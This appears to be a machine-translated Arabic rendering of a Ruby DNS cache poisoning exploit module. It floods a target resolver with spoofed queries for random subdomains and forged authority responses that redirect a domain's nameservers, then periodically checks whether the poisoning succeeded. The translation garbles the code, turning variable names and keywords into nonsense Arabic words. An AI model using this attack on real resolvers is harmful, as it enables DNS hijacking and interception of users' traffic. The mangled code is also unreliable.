# خدع فيضان الهدف مع أسئلة وإستجابات, واحدة أخيرا سيضرب
أسئلة=0
إستجابات=0

[كنّكتيب] [إيف نوت] [إيبسك]

[برينتستتثس] ("يحاول أن يحقن سم سجلات ل # {مجال} '[س] [نمسرفرس] داخل # {هدف}: # {رياضة}…"

بينما يصحّ
[رندهوست]=[رإكس]:: [تإكست.رندتإكستلفنومريك] (12)+"." +يوزّع مجال # ال [هوستنم]

# يرسل خدع سؤال
[رق]=[رسلف]: [نس]:: [مسّج.نو]
[رق.يد]=بطانة (2 ** 16)
[رق.دّقوسأيشن] ([رندهوست], [رسلف]: [نس]:: موردة:: في:: [ا])

[رق.رد]=1

مصنوع من الجلد=(
[سكروبي]:: [إيب.نو] (
#: [سرك] => شوكات [0] [: [أدّر]] [.توس]
: [سرك] => مصدر,
[ست] => هدف,
[روتو] => 17
) [/سكروبي]:: [أودب.نو] (
: رياضة خدع => (بطانة ((2 ** 16) - 1024) +1024) [.توي],
يسرى => 53
) [/رق.نكد]
) [.تونت]
[إيبسك.سندتو] (عجلة تلميع, هدف)
أسئلة += 1

# يرسل شر جوابة من كلّ [نمسرفرس] (شوكات [*] [: [أدّر]])
[رق.دّنسور] ([رندهوست], [نوتّل], [رسلف]: [نس]:: موردة:: في:: [أ.نو] (عنوان))
[رق.دّوثوريتي] (مجال, [نوتّل], [رسلف]: [نس]:: موردة:: في:: [نس.نو] ([رسلف]: [نس]:: [نم.كرت] ([نودنس])))
[رق.دّدّيأيشنل] ([نودنس], [نوتّل], [رسلف]: [نس]:: موردة:: في:: [أ.نو] (عنوان)) يتمّ # يتجاهل
[رق.قر]=1
[رق.ا]=1

[إكسيدبس.وبتو] ([إكسيدبسإكسيدس-1]) |[إيد]|
يتمّ [رق.يد]=[إيد]
[بربس.ش] |شوكة|
عجلة تلميع=(
[سكروبي]:: [إيب.نو] (
#: [سرك] => شوكات [: [أدّر]] [.توس]
: [سرك] => شوكة [: [أدّر]] [.توس],
[ست] => هدف,
[روتو] => 17
) [/سكروبي]:: [أودب.نو] (
: رياضة => 53,
يسرى => [سبورت.توي]
) [/رق.نكد]
) [.تونت]
[إيبسك.سندتو] (عجلة تلميع, هدف)
إستجابات += 1
نهاية
نهاية

# وضع تحديث
إن أسئلة % 1000 == 0
[برينتستتثس] ("يرسل # {أسئلة} خدع أسئلة و # {إستجابات} إستجابات…"
نهاية

# كلّ هكذا غالبا, تدقيق ويرى إن الهدف يكون سمّمت…
إن أسئلة % 250 == 0
يبدأ
سؤال=[رسلف]: [نس]:: [مسّج.نو]
[قور.دّقوسأيشن] (مجال, [رسلف]: [نس]:: موردة:: في:: [نس])
[قور.رد]=0

[سرفسك.بوت] ([قور.نكد])
جوابة, [أدّر]=[سرفسك.ركففروم] ()

إن جوابة و [أنسور.لنغث]>0
جوابة=[رسلف]: [نس]:: يتمّ [مسّج.دكد] (جوابة)
[أنسور.شنسور] |اسم, [تّل], معطيات|
إن (([نم.توس]+"." == مجال و [دت.نم.توس] == [نودنس])
[برينتستتثس] ("يحاول تسمم ناجحة بعد # {أسئلة}: # {مجال} == # {[نودنس]} "
[سرفسك.كلوس]
[ديسكنّكتيب]
عودة
نهاية
نهاية
نهاية
إنقاذ:: توقف
إرتفاع $!
إنقاذ:: استثناء => [إ]
[برينتستتثس] ("خطأ يتساءل ال [دن] اسم: # {[إ.كلسّ]} # {[إ]} # {[إ.بكترس]} "
نهاية
نهاية

نهاية

نهاية

نهاية
نهاية